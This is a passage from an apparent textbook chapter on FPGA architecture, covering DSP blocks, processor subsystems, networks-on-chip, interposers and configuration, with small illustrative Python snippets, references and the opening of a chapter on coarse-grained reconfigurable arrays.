a signal $X = \{x_0, x_1, \ldots, x_T\}$ and coefficients $C = \{c_0, c_1, \ldots, c_{N-1}\}$ that
represent the impulse response of the desired filter, as shown in Eq. (1):

$$y_n = c_0 x_n + c_1 x_{n-1} + \cdots + c_{N-1}\, x_{n-(N-1)} = \sum_{i=0}^{N-1} c_i\, x_{n-i} \tag{1}$$

Many of the FIR filters used in practice are symmetric, with $c_i = c_{N-1-i}$. As a
result of this symmetry, pairs of samples that share a coefficient can be pre-added,
refactoring the computation as shown in Eq. (2) and roughly halving the number of
multiplications (for odd N, the unpaired middle term $c_{(N-1)/2}\, x_{n-(N-1)/2}$ is added):

$$y_n = \sum_{i=0}^{\lfloor N/2 \rfloor - 1} c_i \left( x_{n-i} + x_{n-(N-1-i)} \right) \tag{2}$$
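A minimal Python check of this refactoring, assuming samples outside the signal read as zero (function names are ours):

```python
def fir_direct(c, xs, n):
    """Eq. (1): y_n = sum_{i=0}^{N-1} c_i * x_{n-i}."""
    x = lambda k: xs[k] if 0 <= k < len(xs) else 0
    return sum(ci * x(n - i) for i, ci in enumerate(c))

def fir_folded(c, xs, n):
    """Eq. (2): folded form for symmetric coefficients (c_i == c_{N-1-i});
    pre-adding the paired samples halves the multiplier count."""
    N = len(c)
    x = lambda k: xs[k] if 0 <= k < len(xs) else 0
    acc = sum(c[i] * (x(n - i) + x(n - (N - 1 - i))) for i in range(N // 2))
    if N % 2:                           # unpaired middle tap for odd N
        m = (N - 1) // 2
        acc += c[m] * x(n - m)
    return acc

c = [1, 3, 5, 3, 1]                     # symmetric coefficients, N = 5 taps
xs = [2, 4, 6, 8, 10, 12]
assert all(fir_direct(c, xs, n) == fir_folded(c, xs, n) for n in range(len(xs)))
```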
Fig. 20 Structure of a systolic symmetric FIR filter circuit with coefficients C0–C3
Figure 20 shows the structure of a systolic symmetric FIR filter circuit, which is
a key use case for FPGAs in wireless base stations. Both Stratix and Virtex-4 DSP
blocks can implement the portions highlighted by the dotted boxes, resulting in sig-
nificant efficiency gains compared to implementing them in the FPGA’s soft logic.
Interestingly, while FPGA CAD tools will automatically implement a multiplication
operation (written as a * operator in RTL) in DSP blocks, they will generally not
make use of any of the advanced DSP block features (e.g., accumulation, systolic
registers for FIR filters) unless a designer manually instantiates a vendor-supplied
DSP block IP in the proper mode. Consequently, using the more powerful DSP
block features makes a design less portable when migrating to another FPGA with
different DSP block capabilities. Some work has extended automatic DSP block
inference to sequences of multiply, add and subtract operations in RTL that exactly
match the DSP block capabilities (Ronak and Fahmy 2015a). This can improve
automatic inference to some extent, but it will be difficult to extend to fully utilize
advanced DSP block features like coefficient re-use networks.
The Stratix III/IV DSP block was similar to the Stratix II one but could
implement four 18×18 multipliers per half a DSP block (instead of two) if their
results are summed to limit the number of output routing interfaces. Table 4 lists the
implementation results of both symmetric and asymmetric 51-tap 16-bit FIR filters,
with and without using the hard DSP blocks on a Stratix IV device. When DSP
blocks are not used, we experiment with two different cases: fixed filter coefficients,
and filter coefficients that can change at runtime. If the filter coefficients are fixed,
the multiplier arrays implemented in the soft logic are optimized by synthesizing
away parts of the partial product generation logic that correspond to zero bits
in the coefficient values. Hence, it has lower resource utilization than with input
coefficients that can change at runtime. For the symmetric filter, even when using
the DSP blocks, we still need to use some soft logic resources to implement the
input cascade chains and pre-adders, as shown in Fig. 20. Using the hard DSP
blocks results in 3× higher area efficiency vs. using the soft fabric in the case of
fixed coefficients. This gap grows to 6.2× for filter coefficients that are changeable
during runtime. For the asymmetric filter, the complete FIR filter structure can
be implemented in the DSP blocks without any soft logic resources. Thus, the
Table 4 Implementation results for a 51-tap 16-bit FIR filter on Stratix IV with and without using
the hardened DSP blocks
Symmetric filter
Implementation                   Half-ALMs   DSPs   Area (mm²)     Freq. (MHz)
With DSPs                        403         3.28   0.49 (1.0×)    510 (1.0×)
Without DSPs (fixed coeff.)      3505        0      1.46 (3.0×)    248 (0.5×)
Without DSPs (variable coeff.)   7238        0      3.01 (6.2×)    220 (0.4×)

Asymmetric filter
Implementation                   Half-ALMs   DSPs   Area (mm²)     Freq. (MHz)
With DSPs                        0           6.38   0.63 (1.0×)    510 (1.0×)
Without DSPs (fixed coeff.)      5975        0      2.48 (3.9×)    245 (0.5×)
Without DSPs (variable coeff.)   12867       0      5.35 (8.5×)    217 (0.4×)
area efficiency gap increases to 3.9× and 8.5× for fixed and variable coefficients,
respectively. These gains are large but still less than the 35× gap between FPGAs
and ASICs (Kuon and Rose 2007) usually cited in academia. The difference is
partly due to some soft logic remaining in most application circuits, but even in
the case where the FIR filter perfectly fits into DSP blocks with no soft logic,
the area reduction hits a maximum of 8.5×. The primary reasons for the lower
than 35× gain of Kuon and Rose (2007) are the interfaces to the programmable
routing and the general inter-tile programmable routing wires and muxes that must
be implemented in the DSP tile. In all cases, using the hard DSP blocks results in
about 2× frequency improvement as shown in Table 4. Similarly to BRAMs, the
high operating frequencies of DSP blocks mean they can often be multi-pumped
(run at a multiple of the soft logic frequency); this is mainly used for resource
reduction in DSP-bound designs as in Ronak and Fahmy (2015b).
The next few FPGA architecture generations from both Altera and Xilinx
witnessed only minor changes in the DSP block architecture. The main focus of
both vendors was to fine-tune the DSP block capabilities for emerging application
domains without adding costly programmable routing interfaces. In Stratix V, the
DSP block was greatly simplified to natively support two 18×18 bit multiplications
(suitable for signal processing) or one 27×27 multiplication (suitable for single-
precision floating-point mantissa multiplication). As a result, the simpler Stratix V
DSP block spanned a single row, which is more friendly to Altera’s row redundancy
scheme (i.e., the ability to skip single FPGA rows with fabrication faults in them
to increase the effective yield). In addition, input pre-adders as well as embedded
coefficient banks to store read-only filter weights were added, which allowed
implementation of the whole symmetric FIR filter structure shown in Fig. 20 inside
the DSP blocks without the need for any soft logic resources. Xilinx followed a
similar path in incorporating 27×18 multiplication with support for pre-adders in
Virtex-6 DSP blocks.
As shown in Fig. 18, Xilinx DSP blocks since Virtex-5 have incorporated an
ALU that can perform logic operations as well as add and subtract; both the ALU
operation and the data paths through the DSP are selected by additional inputs so
they can change dynamically from cycle to cycle. This enhancement makes these
DSP blocks well suited for the datapath of a soft processor (Cheah et al. 2014).
Controlling DSP operations dynamically in this manner increases the flexibility of
the block, but has some area cost as adding routing input ports for dynamic control
signals is more expensive than adding configuration SRAM cells to statically select
operations.
As illustrated in Fig. 18, up to 2009 the evolution of the DSP block archi-
tecture was mainly driven by the precisions and requirements of communication
applications, especially in wireless base stations, with very few academic research
explorations. With the large-scale deployment of FPGAs in datacenters and the
emergence of DL as a key component of many applications both in datacenter and
edge workloads, the DSP block architecture has evolved in two different directions.
The first direction targets the high-performance computing (HPC) domain by adding
native support for single-precision floating-point (fp32) multiplication. Before
that, FPGA vendors would supply designers with IP cores that implement floating-
point arithmetic out of fixed-point DSPs and a considerable amount of soft logic
resources. This created a major barrier for FPGAs to compete with CPUs and GPUs
(which have dedicated floating-point units) in the HPC domain. Native floating-
point capabilities were first introduced in Intel’s Arria 10 architecture, with a key
design goal of avoiding a large increase in DSP block area (Langhammer and Pasca
2015). By reusing the same interface to the programmable routing, not supporting
uncommon features like subnormals, flags and multiple rounding schemes, and
maximizing the reuse of existing fixed-point hardware, the block area increase was
limited to only 10% (which translates to 0.5% total die area increase). Floating-point
capabilities are supported in all subsequent generations of Intel FPGAs and in the
DSP58 tiles of the Xilinx Versal architecture (Gaide et al. 2019).
The second direction targets increasing the density of low-precision integer
multiplication specifically for DL inference workloads. Prior work has demonstrated
the use of low-precision fixed-point arithmetic (8-bit and below) instead of fp32
with negligible or no accuracy degradation and greatly reduced hardware cost (Wang
et al. 2019). However, the required precision is model-dependent and can even vary
between different layers of the same model. As a result, FPGAs have emerged as
an attractive solution for DL inference due to their ability to implement custom
precision datapaths. This has led both academic researchers and FPGA vendors to
investigate adding native support for low-precision multiplication to DSP blocks.
Boutros et al. (2018) enhanced the fracturability of an Intel-like DSP block to
support more int9 and int4 multiply and MAC operations, while keeping the
same DSP block routing interface and ensuring its backward compatibility. The
proposed DSP block could implement four int9 and eight int4 multiply/MAC
operations along with Arria-10-like DSP block functionality at the cost of 12%
DSP block area increase, which is equivalent to only 0.6% increase in total die
area. This DSP block increased the performance of 8-bit and 4-bit DL accelerators
by 1.3× and 1.6× while reducing the utilized FPGA resources by 15% and 30%
respectively, compared to an FPGA with DSPs that do not natively support these
modes of operation. Another academic work (Rasoulinezhad et al. 2019) enhanced
a Xilinx-like DSP block by including a fracturable multiplier array instead of the
fixed-precision multiplier in the DSP48E2 block to support int9, int4 and int2
precisions. It also added a FIFO register file and special dedicated interconnect
between DSP blocks to enable more efficient standard, point-wise and depth-wise
convolution layers. Shortly after, the Intel Agilex DSP block added support for
an int9 mode of operation along with half-precision floating-point (fp16) and
brain float (bfloat16) precisions as well. Also, the Xilinx Versal architecture
now natively supports int8 multiplications in its DSP58 tiles (Gaide et al. 2019).
Throughout the years, the DSP block architecture has evolved to best suit the
requirements of key application domains of FPGAs, and provide higher flexibility
such that many different applications can benefit from its capabilities. The common
focus across all the steps of this evolution was reusing multiplier arrays and routing
ports as much as possible to best utilize both these costly resources. However,
this becomes harder with the recent divergence in the DSP block requirements
of key FPGA application domains between high-precision floating-point in HPC,
medium-precision fixed-point in communications, and low-precision fixed-point in
DL. As a result, Intel introduced its first domain-specialized FPGA optimized for
artificial intelligence (AI) workloads, the Stratix 10 NX. This new FPGA replaces
conventional DSP blocks with AI tensor blocks (Langhammer et al. 2021). The
tensor blocks drop the support for legacy DSP modes and precisions that were
targeting the communications domain and adopt new ones targeting the DL domain
specifically. This tensor block significantly increases the number of int8 and int4
MACs to 30 and 60 per block respectively, at almost the same die size. Feeding
all multipliers with inputs without adding more routing ports is a key concern.
Accordingly, the NX tensor block introduces a double-buffered data reuse register
network that can be sequentially loaded from a smaller number of routing ports,
while allowing common DL compute patterns to make the best use of all available
multipliers. Recent work has shown that the Stratix 10 NX with tensor blocks can
deliver an average 3.5× performance boost compared to FPGAs with conventional
DSP blocks for real-time DL inference workloads (Boutros et al. 2020).
Processor Subsystems
Fig. 21 (a) Early Xilinx FPGA with a MicroBlaze soft processor implemented in soft logic, (b)
Xilinx Virtex-II Pro FPGA with 2 hard PowerPC blocks whose peripherals are implemented in
soft logic, (c) Xilinx Zynq Ultrascale+ with a complete hard processor subsystem, and (d) Xilinx
Versal architecture with both a hard scalar processor subsystem and a spatial vector processor array
The first processors on FPGAs were soft cores implemented in the programmable
fabric, most notably the vendor-supplied Nios II and MicroBlaze processors from
Altera and Xilinx, respectively. This alleviated the design burden for FPGA users
while still allowing them to flexibly configure their architecture parameters (e.g.,
instruction/data cache sizes, number of cache levels, ALU capabilities, etc.) to
match the application requirements. However, these soft processors are still area-
inefficient, slower, and have limited capabilities (e.g., scalar, single-issue, in-order
microarchitecture) compared to mainstream CPUs, which makes them more suitable
for lightweight control and housekeeping tasks rather than compute-oriented ones.
The gap is even larger compared to direct hardware execution on repetitive tasks.
For example, a Nios II soft processor on a Stratix IV FPGA runs at 250 MHz
and consumes 1130 LUTs, 4 DSPs, and 11 BRAMs. When used to compute a
simple third-degree polynomial, it has 50× less performance, 130× higher energy,
and 2× higher LUT utilization compared to a dedicated hardware implementation
(configured into the FPGA) of the same function. Some studies attempt to optimize
scalar soft processors for more compute-intensive tasks by adding support for vector
instructions. Yiannacouras et al. show that a vector soft processor can improve
performance by 25× over a scalar soft processor; while area increases, the area-
delay product is still 3× better than a scalar soft processor (Yiannacouras et al.
2009).
As more systems incorporated processors for control and less compute-intensive
tasks, FPGA vendors began to harden processor cores to increase performance
vs. soft processors. For example, the Xilinx Virtex-II Pro architecture had up to
2 IBM PowerPC RISC processor blocks as illustrated in Fig. 21b, while Altera
integrated an ARM core in the Apex architecture. These initial efforts hardened
only the raw processor core with primitive wire interfaces to the programmable
fabric, while the rest of the processor subsystem (e.g., memory controller and
peripherals) had to be implemented in the soft logic. This was still time-consuming
and did not show enough efficiency gains compared to soft processors to justify
the higher design effort and reduced configurability; consequently, these hardened
processor-core-only systems were not very successful. With FPGAs growing into
more complex and heterogeneous platforms, complete hard processor subsystems
(i.e., processors along with their key peripherals) have been incorporated in recent
FPGA architectures. This approach has been much more successful as it provides
designers with an easy-to-use software environment for implementing portions
of their applications, while still achieving a significantly higher performance and
energy efficiency compared to soft processors. Consequently, high-performance
full-featured hard processor subsystems are now available in most FPGA families.
For example, Xilinx’s Zynq Ultrascale+ (in Fig. 21c) has an embedded quad-core
ARM Cortex-A53 processor along with a cache coherency unit, a memory man-
agement unit, direct memory access controller, and many different IO peripherals
(e.g., USB, I2C, UARTs, GPIOs, etc.) to communicate with the outside world, as
well as the tightly coupled FPGA fabric. These hybrid devices can be used in many
applications where the processor handles strictly serial and branching portions of
the workload while the highly-parallel compute-intensive portions are offloaded to
the FPGA – this echoes the initial vision for reconfigurable computer architectures
in the 1960s (Estrin 1960).
The Xilinx Versal architecture integrates not only an FPGA fabric and a tradi-
tional hard processor subsystem, but also a many-core vector processor complex
with bus-based reconfigurable interconnect, as shown in Fig. 21d. This architecture
still has a spatial nature (similar to an FPGA), and combines the software-
level programmability of vector processors with the flexibility of programmable
interconnects, making processor cores essentially another form of logic blocks
in reconfigurable devices. This new architecture is initially targeted at 5G signal
processing and AI, two large and compute-intensive markets for FPGAs. New tools
for architecture exploration and evaluation of these highly heterogeneous devices
are also emerging (Boutros et al. 2022), enabling new research into both their
programming models and efficiency in various applications.
System-Level Interconnect: Network-on-Chip
As FPGAs have grown in both capacity and IO speed, distributing ever higher
bandwidth data streams throughout an ever larger fabric has become challenging.
Traditionally the system-level interconnect that connects high-speed IO interfaces
such as DDR, PCIe and Ethernet to modules implemented in the FPGA fabric has
been implemented as soft buses. These soft buses include multiplexing, arbitration,
pipelining and wiring between the relevant endpoints. As the data bandwidth of
external IO interfaces has increased, these soft buses have been forced to become
very wide to carry the larger data streams, increasing their resource utilization and
making timing closure harder. For example, a single channel of high-bandwidth
memory (HBM) has a 128-bit double data rate interface operating at 1 GHz,
so a bandwidth-matched soft bus running at 250 MHz must be 1024 bits wide.
With recent FPGAs incorporating up to 8 HBM channels as well as numerous
PCIe, Ethernet and other interfaces, system level interconnect can rapidly use
a major fraction of the FPGA logic and routing resources. In addition, system-
level interconnect tends to span long distances. The combination of very wide and
physically long buses makes timing closure challenging and usually requires deep
pipelining of the soft bus, further increasing its resource use. The system-level
interconnect challenge is becoming more difficult in advanced process nodes, as
the number and speed of FPGA external interfaces increases, and the metal wire
parasitics (and thus interconnect delay) scales poorly (Bohr 1995).
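The width arithmetic for a bandwidth-matched soft bus is shown below; the helper name and the use of integer MHz/Mb rates are our own choices.

```python
import math

def soft_bus_width(io_bits, io_clock_mhz, ddr, fabric_mhz):
    """Width of a soft bus that matches an external interface's bandwidth."""
    io_bandwidth = io_bits * io_clock_mhz * (2 if ddr else 1)  # Mb/s
    return math.ceil(io_bandwidth / fabric_mhz)

# One HBM channel: 128 bits, double data rate, 1 GHz interface; a soft
# bus that closes timing at 250 MHz must be 1024 bits wide to keep up.
print(soft_bus_width(128, 1000, ddr=True, fabric_mhz=250))   # -> 1024
```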
Abdelfattah and Betz (2013) proposed embedding a hard, packet-switched
network-on-chip (NoC) in the FPGA fabric to enable more efficient and easier-
to-use system-level interconnect. Although a full-featured packet-switched NoC
could be implemented using the soft logic and routing of an FPGA, an NoC with
hardened routers and links is 23× more area efficient, 6× faster, and consumes
11× less power compared to a soft NoC. Designing a hard NoC for an FPGA is
challenging since the FPGA architect must commit many choices to silicon (e.g.,
number of routers, link width, NoC topology) yet still maintain the flexibility of an
FPGA to implement a wide variety of applications using many different external
interfaces and communication endpoints. Work in Abdelfattah and Betz (2013)
advocates for a mesh topology with a moderate number of routers (e.g., 16) and
fairly wide (128-bit) links; these choices keep the area cost to less than 2% of
the FPGA while ensuring the NoC is easier to lay out and a single NoC link can
carry the entire bandwidth of a DDR channel. A hard NoC must also be able
to flexibly connect to user logic implemented in the FPGA fabric. Abdelfattah
et al. (2015) introduced the fabric port which interfaces the hard NoC routers to
the FPGA programmable fabric by performing width adaptation, clock domain
crossing and voltage translation. This decouples the NoC from the FPGA fabric
such that the NoC can run at a fixed (high) frequency, and still interface to FPGA
logic and IO interfaces of different speeds and bandwidth requirements with very
little glue logic. Hard NoCs also appear very well suited to FPGAs in datacenters.
Datacenter FPGAs are normally configured in two parts: a shell provides system-
level interconnect to the external interfaces, and a role implements the application
acceleration functionality (Caulfield et al. 2016). The resource use of the shell can
be significant: it requires 23% of the device resources in the first generation of
Microsoft’s Catapult systems (Putnam et al. 2014). Yazdanshenas and Betz (2018)
showed that a hard NoC significantly improves resource utilization, operating
frequency and routing congestion in datacenter FPGAs. Other studies have proposed
FPGA-specific optimizations to increase the area efficiency and performance of soft
NoCs (Kapre and Gray 2017; Papamichael and Hoe 2012). However, Yazdanshenas
and Betz (2018) showed that even optimized soft NoCs still trail hard NoCs in usable
bandwidth, latency, area and routing congestion.
Fig. 22 Network-on-Chip system-level interconnect in next-generation (a) Xilinx Versal and (b)
Achronix Speedster7t architectures
Recent Xilinx Versal and Achronix Speedster7t FPGAs integrate a hard NoC
similar to the academic proposals discussed above. Versal uses a hard NoC
for system-level communication between various endpoints (Gigabit transceivers,
processor, AI subsystems, soft fabric), and is in fact the only way for external
memory interfaces to communicate with the rest of the device (Swarbrick et al.
2019). It uses 128-bit wide links running at 1 GHz, matching a DDR channel’s
bandwidth. Its topology is related to a mesh, but with all horizontal links pushed
to the top and bottom of the device to make it easier to lay out within the FPGA
floorplan. The Versal NoC contains multiple rows (i.e., chains of links and routers)
at the top and bottom of the device, and a number of vertical NoC columns (similar
to any other hard block columns such as DSPs) depending on the device size as
shown in Fig. 22a. The NoC has programmable routing tables that are configured at
boot time and provides standard AXI interfaces as its fabric ports. The Speedster7t
NoC topology is optimized for external interface to fabric transfers. It consists of
a peripheral ring around the fabric with NoC rows and columns at regular intervals
over the FPGA fabric as shown in Fig. 22b. The peripheral ring NoC can operate
independently without configuring the FPGA fabric to route the traffic between
different external interfaces. There is no direct connectivity between the NoC rows
and columns; the packets from a master block connecting to a NoC row will pass
through the peripheral ring to reach a slave block connected to a NoC column.
Interposers
FPGAs have been early adopters of interposer technology that allows dense
interconnection of multiple silicon dice. As shown in Fig. 23a, a passive interposer is
a silicon die (often in a trailing process technology to reduce cost) with conventional
metal layers forming routing tracks and thousands of microbumps on its surface
Fig. 23 (a) An FPGA system built from multiple dice on a passive silicon interposer with
microbumps and (b) transceiver chiplets connected to an FPGA die through embedded multi-die
interconnect bridges (EMIB) in the package substrate
that connect to two or more dice flipped on top of it. One motivation for interposer-
based FPGAs is achieving higher logic capacity at a reasonable cost. Both high-end
systems and emulation platforms to validate ASIC designs before fabrication
demand FPGAs with high logic capacity. However, large monolithic (i.e., single-
silicon-die) devices have poor yield, especially early in the lifetime of a process
technology (exactly when the FPGA is state-of-the-art). Combining multiple smaller
dice on a silicon interposer is an alternative approach that can have higher yield. A
second motivation for 2.5D systems is to enable integration of different specialized
chiplets (possibly using different process technologies) into a single system. This
approach is also attractive for FPGAs as the fabric’s programmability can bridge
disparate chiplet functionality and interface protocols.
Xilinx’s largest devices starting from the Virtex-7 (28 nm) generation use passive
silicon interposers to integrate three or four FPGA dice that each form a portion
of the FPGA’s rows. The largest interposer-based devices provide more than twice
the logic elements of the largest monolithic FPGAs at the same process node.
The FPGA programmable routing requires a large amount of interconnect, raising
the question of whether the interposer microbumps (which are much larger and
slower than conventional routing tracks) will limit the routability of the system.
For example, in Virtex-7 interposer-based FPGAs, only 23% of the vertical routing
tracks cross between dice through the interposer (Nasiri et al. 2015), with an
estimated additional delay of ∼1 ns (Chaware et al. 2012). The study in Nasiri et al.
(2015) showed that CAD tools that place the FPGA logic to minimize crossing of
an interposer boundary combined with architecture changes that increase the switch
flexibility to the interposer-crossing tracks can largely mitigate the impact of this
reduced signal count. The entire vertical bandwidth of the NoC in the Xilinx Ver-
sal architecture (discussed in the “System-Level Interconnect: Network-on-Chip”
section) crosses between dice, helping to provide more interconnect bandwidth.
An embedded NoC makes good use of the limited number of wires that can cross
an interposer, as it runs its links at a high frequency and they can be shared by
different communication streams as they are packet-switched. Xilinx has also used
their interposer technology for heterogeneous integration by incorporating HBM,
starting with their 16 nm Virtex Ultrascale+ generation.
Intel FPGAs instead use smaller interposers called embedded multi-die inter-
connect bridges (EMIB) carved into the package substrate as shown in Fig. 23b.
Intel Stratix 10 devices use EMIB to integrate a large FPGA fabric die with smaller
IO transceiver or HBM chiplets in the same package, decoupling the design and
process technology choices of these two crucial elements of an FPGA. Some recent
studies (Nurvitadhi et al. 2018, 2019) used EMIB technology to tightly couple an
FPGA fabric with specialized ASIC accelerator chiplets for DL applications. This
approach offloads specific kernels of the computation (e.g., matrix-matrix or matrix-
vector multiplications) to the more efficient specialized chiplets, while leveraging
the FPGA fabric to interface to the outside world and to implement rapidly changing
DL model components.
Configuration
An FPGA’s configuration circuitry loads the bitstream into the millions of SRAM
cells that control the LUTs, routing switches and configuration bits in hard blocks.
On power up, a configuration controller loads this bitstream serially from a source
such as on-board flash. When a sufficient group of configuration bits are buffered,
they are written in parallel to a group of configuration SRAM cells, in a manner
similar to writing a (very wide) word to an SRAM array. This configuration circuitry
can also be accessed by the FPGA fabric and embedded processor subsystems,
allowing partial reconfiguration of one part of the device while another portion
continues processing. For high-reliability applications, this configuration circuitry
can also be used to continuously read back the programmed configuration of the
device and compute a cyclic redundancy check (CRC) in order to detect if any
configuration SRAM cells have been upset by soft errors (such as those induced
by high energy radiation).
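The readback-CRC idea can be illustrated in a few lines of Python; note that real FPGAs use dedicated CRC hardware and frame-based readback, so zlib.crc32 and the byte-array "bitstream" here are purely illustrative stand-ins.

```python
import zlib

# Sketch of the readback-and-check scheme described above: hash the
# configuration state periodically and compare against a golden value.
golden_bitstream = bytes([0x3A, 0x5C, 0x7E, 0x01] * 1024)
golden_crc = zlib.crc32(golden_bitstream)

def readback_check(configuration_sram: bytes) -> bool:
    """Return True if no configuration upset is detected."""
    return zlib.crc32(configuration_sram) == golden_crc

upset = bytearray(golden_bitstream)
upset[100] ^= 0x04                       # flip one configuration bit (SEU)
print(readback_check(golden_bitstream))  # -> True
print(readback_check(bytes(upset)))      # -> False
```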
A complete FPGA application is very valuable intellectual property, and without
security measures it could be cloned simply by copying the programming bitstream.
To avoid this, FPGA CAD tools can optionally encrypt a bitstream, and FPGA
devices can have a private decryption key programmed in by the manufacturer to
be used by the configuration controller, making a bitstream usable only by a single
customer who purchases FPGAs with the proper key.
Conclusion
FPGAs have evolved from simple arrays of programmable logic blocks and IOs
interconnected via programmable routing into complex multi-die systems with
many different embedded components such as BRAMs, DSPs, high-speed external
interfaces, and system-level NoCs. The recent adoption of FPGAs in the HPC and
datacenter domains, along with the emergence of new high-demand applications
such as deep learning, is ushering in a new phase of FPGA architecture design.
These new applications and the multi-user paradigm of the datacenter create
opportunities for architectural innovation. At the same time, process technology
scaling is changing in fundamental ways. Wire delay is scaling poorly which
motivates rethinking programmable routing architecture. Interposers and 3D inte-
gration enable entirely new types of heterogeneous systems. Controlling power
consumption is an overriding concern, and is likely to lead to FPGAs with more
power-gating and more heterogeneous hard blocks. We do not claim to predict the
future of FPGA architecture, except that it will be interesting and different from
today!
References
Abdelfattah MS, Betz V (2013) The case for embedded networks on chip on field-programmable
gate arrays. IEEE Micro 34(1):80–89
Abdelfattah MS et al (2015) Take the highway: design for embedded NoCs on FPGAs. In:
ACM/SIGDA International Symposium on Field-Programmable Gate Arrays (FPGA), pp 98–
107
Ahmed E, Rose J (2004) The effect of LUT and cluster size on deep-submicron FPGA performance
and density. IEEE Trans Very Large Scale Integr (VLSI) Syst 12(3):288–298
Ahmed I et al (2019) FRoC 2.0: automatic BRAM and logic testing to enable dynamic voltage
scaling for FPGA applications. ACM Trans Reconfig Technol Syst (TRETS) 12(4):1–28
Betz V, Rose J (1998) How much logic should go in an FPGA logic block? IEEE Des Test Comput
15(1):10–15
Betz V, Rose J (1999) FPGA routing architecture: segmentation and buffering to optimize speed
and density. In: ACM International Symposium on FPGAs, pp 59–68
Betz V et al (1999) Architecture and CAD for deep-submicron FPGAs. Springer Science &
Business Media, New York
Bohr MT (1995) Interconnect scaling – the real limiter to high performance ULSI. In: Proceedings
of International Electron Devices Meeting. IEEE, pp 241–244
Boutros A et al (2018) You cannot improve what you do not measure: FPGA vs. ASIC efficiency
gaps for convolutional neural network inference. ACM Trans Reconfig Technol Syst (TRETS)
11(3):1–23
Boutros A et al (2018) Embracing diversity: enhanced DSP blocks for low-precision deep learning
on FPGAs. In: IEEE International Conference on Field Programmable Logic and Applications
(FPL), pp 35–357
Boutros A et al (2020) Beyond peak performance: comparing the real performance of AI-optimized
FPGAs and GPUs. In: IEEE International Conference on Field-Programmable Technology
(FPT), pp 10–19
Boutros A et al (2022) Architecture and application co-design for beyond-FPGA reconfigurable
acceleration devices. IEEE Access 10:95067–95082
Rasoulinezhad S et al (2020) LUXOR: an FPGA logic cell architecture for efficient compressor
tree implementations. In: ACM/SIGDA International Symposium on Field-Programmable Gate
Arrays (FPGA), pp 161–171
Rettkowski J et al (2017) HW/SW co-design of the HOG algorithm on a xilinx zynq SoC. J Parallel
Distrib Comput 109:50–62
Ronak B, Fahmy SA (2015a) Mapping for maximum performance on FPGA DSP blocks. IEEE
Trans Comput-Aided Design Integr Circuits Syst 35(4):573–585
Ronak B, Fahmy SA (2015b) Minimizing DSP block usage through multi-pumping. In: Interna-
tional Conference on Field Programmable Technology (FPT)
Sivaswamy S et al (2005) HARP: hard-wired routing pattern FPGAs. In: International Symposium
on Field-Programmable Gate Arrays (FPGA)
Swarbrick I et al (2019) Network-on-chip programmable platform in versal ACAP architecture. In:
ACM/SIGDA International Symposium on Field-Programmable Gate Arrays (FPGA), pp 212–
221
Tang X et al (2019) A study on switch block patterns for tileable FPGA routing architectures. In:
IEEE International Conference on Field-Programmable Technology (FPT), pp 247–250
Tatsumura K et al (2016) High density, low energy, magnetic tunnel junction based block RAMs for
memory-rich FPGAs. In: IEEE International Conference on Field-Programmable Technology
(FPT), pp 4–11
Tessier R et al (2007) Power-efficient RAM mapping algorithms for FPGA embedded memory
blocks. IEEE Trans Comput-Aided Des Integr Circuits Syst 26(2):278–290
Turakhia Y et al (2018) Darwin: a genomics co-processor provides up to 15,000x acceleration on
long read assembly. ACM SIGPLAN Not 53(2):199–213
Tyhach J et al (2004) A 90 nm FPGA I/O buffer design with 1.6 Gbps data rate for source-
synchronous system and 300 MHz clock rate for external memory interface. In: IEEE Custom
Integrated Circuits Conference, pp 431–434
Upadhyaya P et al (2016) A fully-adaptive wideband 0.5–32.75 Gb/s FPGA transceiver in 16 nm
FinFET CMOS technology. In: IEEE Symposium on VLSI Circuits, pp 1–2
Wang E et al (2019) Deep neural network approximation for custom hardware: where we’ve been,
where we’re going. ACM Comput Surv (CSUR) 52(2):1–39
Wilton S et al (1995) Architecture of centralized field-configurable memory. In: ACM International
Symposium on Field-Programmable Gate Arrays (FPGA), pp 97–103
Wong H et al (2011) Comparing FPGA vs. custom cmos and the impact on processor microar-
chitecture. In: ACM/SIGDA International Symposium on Field-Programmable Gate Arrays
(FPGA), pp 5–14
Yazdanshenas S, Betz V (2018) Interconnect solutions for virtualized field-programmable gate
arrays. IEEE Access 6:10497–10507
Yazdanshenas S, Betz v (2019) COFFE 2: automatic modelling and optimization of complex and
heterogeneous FPGA Architectures. ACM Trans Reconfig Technol Syst (TRETS), 12(1):1–27
Yazdanshenas S et al (2017) Don’t forget the memory: automatic block RAM modelling,
optimization, and architecture exploration. In: ACM/SIGDA International Symposium on Field-
Programmable Gate Arrays (FPGA), pp 115–124
Yiannacouras P et al (2009) Data parallel FPGA workloads: software versus hardware. In: IEEE
International Conference on Field-Programmable Logic and Applications (FPL), pp 51–58
Young-Schultz T et al (2020) Using openCL to enable software-like development of an FPGA-
accelerated biophotonic cancer treatment simulator. In: ACM/SIGDA International Symposium
on Field-Programmable Gate Arrays (FPGA), pp 86–96
Zgheib G et al (2014) Revisiting and-inverter cones. In: ACM/SIGDA International Symposium
on Field-Programmable Gate Arrays (FPGA), pp 45–54
Zhao Z et al (2020) Achieving 100 Gbps intrusion prevention on a single server. In: USENIX
Symposium on Operating Systems Design and Implementation (OSDI), pp 1083–1100
14 Coarse-Grained Reconfigurable Array (CGRA)
Zhaoying Li, Dhananjaya Wijerathne, and Tulika Mitra
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
Historical Context . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468
Architecture: A Landscape of Modern CGRA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Compilation for CGRAs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Modulo Scheduling and Modulo Routing Resource Graph (MRRG) . . . . . . . . . . . . . . . . . 475
CGRA Mapping Approaches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477
Other Compilation-Related Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 500
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 500
Abstract
This chapter presents coarse-grained reconfigurable arrays (CGRAs), starting with the historical context, sketching the architectural landscape, and providing an extensive overview of the compilation approaches.
Keywords
Introduction
